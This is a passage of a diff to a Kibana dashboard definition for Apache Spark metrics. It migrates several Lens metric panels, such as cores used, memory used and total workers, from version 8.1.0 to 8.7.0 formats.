false, - "index": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "key": "apache_spark.node.worker.cores.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.worker.cores.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "0c759a6f-eef3-4849-81bb-9482134df3c0", - "layerId": "87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "vis": { + "legendOpen": true + }, + "type": "lens" + }, + "title": "Application Source Status [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", + "w": 13, + "x": 0, + "y": 36 + }, + "panelIndex": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "87763c10-0d2a-4ff0-afb1-4d261c6c52de": { + "columnOrder": [ + 
"0c759a6f-eef3-4849-81bb-9482134df3c0" + ], + "columns": { + "0c759a6f-eef3-4849-81bb-9482134df3c0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Cores Used", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.worker.cores.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true, - "vis": null - }, - "gridData": { - "h": 9, - "i": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", - "w": 13, - "x": 0, - "y": 36 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", - "title": "Number of Cores used [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "key": "apache_spark.node.worker.cores.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.worker.cores.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "0c759a6f-eef3-4849-81bb-9482134df3c0", + "layerId": "87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a871806a-160b-4da4-bcd5-700175899a73", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "55f22446-ec98-430e-b92e-0660335ab2d9", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "7a60dd89-db58-4e7e-b73a-139574b69402": { - "columnOrder": [ - "2001af6a-ebf0-4acc-afe2-d58db49ee160" - ], - "columns": { - "2001af6a-ebf0-4acc-afe2-d58db49ee160": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Used (MB)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.worker.memory.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a871806a-160b-4da4-bcd5-700175899a73", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "55f22446-ec98-430e-b92e-0660335ab2d9", - "key": "apache_spark.node.worker.memory.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.worker.memory.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "2001af6a-ebf0-4acc-afe2-d58db49ee160", - "layerId": "7a60dd89-db58-4e7e-b73a-139574b69402", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + 
"vis": null, + "type": "lens" + }, + "title": "Number of Cores used [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", + "w": 13, + "x": 13, + "y": 36 + }, + "panelIndex": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a871806a-160b-4da4-bcd5-700175899a73", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "55f22446-ec98-430e-b92e-0660335ab2d9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "7a60dd89-db58-4e7e-b73a-139574b69402": { + "columnOrder": [ + "2001af6a-ebf0-4acc-afe2-d58db49ee160" + ], + "columns": { + "2001af6a-ebf0-4acc-afe2-d58db49ee160": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory Used (MB)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.worker.memory.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a871806a-160b-4da4-bcd5-700175899a73", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true, - "vis": null - }, - "gridData": { - "h": 9, - "i": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", - "w": 13, - "x": 13, - "y": 36 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0", - 
"title": "Memory Used [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "55f22446-ec98-430e-b92e-0660335ab2d9", + "key": "apache_spark.node.worker.memory.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.worker.memory.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "2001af6a-ebf0-4acc-afe2-d58db49ee160", + "layerId": "7a60dd89-db58-4e7e-b73a-139574b69402", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1723d45d-1e3e-422c-921d-06a9ad1d3309", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "59410b0e-e834-4387-b6a8-dd1e252c87c9", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "340a830f-a169-4a46-959d-6471aac521f9": { - "columnOrder": [ - "fa33204d-6b0a-45ee-8a54-480191ba2782" - ], - "columns": { - "fa33204d-6b0a-45ee-8a54-480191ba2782": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Workers", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.workers.count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1723d45d-1e3e-422c-921d-06a9ad1d3309", - "key": "event.dataset", - "negate": 
false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "59410b0e-e834-4387-b6a8-dd1e252c87c9", - "key": "apache_spark.node.main.workers.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.workers.count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "fa33204d-6b0a-45ee-8a54-480191ba2782", - "layerId": "340a830f-a169-4a46-959d-6471aac521f9", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "vis": null, + "type": "lens" + }, + "title": "Memory Used [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", + "w": 8, + "x": 26, + "y": 39 + }, + "panelIndex": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1723d45d-1e3e-422c-921d-06a9ad1d3309", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "59410b0e-e834-4387-b6a8-dd1e252c87c9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "340a830f-a169-4a46-959d-6471aac521f9": { + "columnOrder": [ + "fa33204d-6b0a-45ee-8a54-480191ba2782" + ], + "columns": { + "fa33204d-6b0a-45ee-8a54-480191ba2782": { + 
"customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Workers", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.workers.count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1723d45d-1e3e-422c-921d-06a9ad1d3309", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", - "w": 8, - "x": 26, - "y": 39 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d", - "title": "Total Workers [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Metrics Apache Spark] Overview", - "version": 1 - }, - "coreMigrationVersion": "8.1.0", - "id": "apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156", - "migrationVersion": { - "dashboard": "8.1.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:9857a495-b7e6-4893-93e6-f16c050e0e41", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:d59683b7-5f29-46b9-b01b-20b6aea422fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-current-indexpattern", - "type": 
"index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2943002d-504e-4a30-a581-cd92fd621fe1:5df2fe94-f51b-44f9-b922-75663cb6996a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:603b47e3-4608-4094-8826-f923eab506a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:4a09ba27-dc93-43cf-be91-0632bc81cb47", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:7e8d1def-772c-494c-b14e-eae96e52b074", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:c5b629cf-0836-49ff-a409-23cb47735f02", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - 
"type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:787550e5-b4cd-4892-babc-4f3d33c078ec", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "64cbf207-795a-4818-915c-137eaebc6198:97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:509e9888-4307-45b6-9c04-5b7feafeef87", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62c6f93e-b6c1-4004-b780-535ed730ebaa:df5be9fa-fb96-4da2-a042-71b37b7c3275", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:3fe0b162-ec79-4815-895a-79ac382ca1d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa:62857a2d-669f-4c70-9f92-dcab405c9f9a", - "type": "index-pattern" - 
}, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b5caa5d1-221e-400d-a11a-ea539f1f4546:1215080a-2795-41e4-a618-d54b0e020cbc", - "type": "index-pattern" - }, - { - "id": "apache_spark-114428e0-c165-11ec-97dc-abb2b7efe8a8", - "name": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18:panel_7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "type": "lens" - }, - { - "id": "apache_spark-478726a0-c165-11ec-97dc-abb2b7efe8a8", - "name": "0595e44f-e6b0-4d93-868f-040f2eb0de31:panel_0595e44f-e6b0-4d93-868f-040f2eb0de31", - "type": "lens" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:171181c8-0b9a-4664-85cb-0e8b82132b7a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2:6ffc819a-ab7a-43bd-aa18-dbd327428425", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "75c23769-a2bd-4825-b20a-d140aeb36175:975bff6a-acfa-481f-86ba-7d697e207f65", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"75c23769-a2bd-4825-b20a-d140aeb36175:b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab9316b5-5728-4b03-aadb-a93e22da9257:a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad:948085ee-3b01-4c26-8bb4-b3c40b02049d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:e76b86a5-b6ba-4537-a0d1-046096a9807d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cfbdf185-1437-478f-a856-eedbe62d1de2:d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": 
"78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "78e81e12-c659-4d89-a80d-14ec4e49368a:c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843:fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:a871806a-160b-4da4-bcd5-700175899a73", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "18c0d3d3-912f-42e4-a322-a5fcaa9002b0:55f22446-ec98-430e-b92e-0660335ab2d9", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:indexpattern-datasource-layer-340a830f-a169-4a46-959d-6471aac521f9", - "type": "index-pattern" - }, - { - "id": 
"metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:1723d45d-1e3e-422c-921d-06a9ad1d3309", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "54e6714e-c9b2-4e0b-85f4-500ca898eb4d:59410b0e-e834-4387-b6a8-dd1e252c87c9", - "type": "index-pattern" - } + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "59410b0e-e834-4387-b6a8-dd1e252c87c9", + "key": "apache_spark.node.main.workers.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.workers.count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "fa33204d-6b0a-45ee-8a54-480191ba2782", + "layerId": "340a830f-a169-4a46-959d-6471aac521f9", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Workers [Metrics Apache Spark]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Apache Spark] Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:9857a495-b7e6-4893-93e6-f16c050e0e41", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3339a86-6f2b-4f1a-85b8-4619c417a110:d59683b7-5f29-46b9-b01b-20b6aea422fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-current-indexpattern", + "type": 
"index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "2943002d-504e-4a30-a581-cd92fd621fe1:5df2fe94-f51b-44f9-b922-75663cb6996a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:603b47e3-4608-4094-8826-f923eab506a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "784e4a18-20e7-48ef-8737-3a8a4643c4fe:4a09ba27-dc93-43cf-be91-0632bc81cb47", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:7e8d1def-772c-494c-b14e-eae96e52b074", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f:c5b629cf-0836-49ff-a409-23cb47735f02", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f84a1cd9-1b4b-484e-87f7-953c2f645570:indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + 
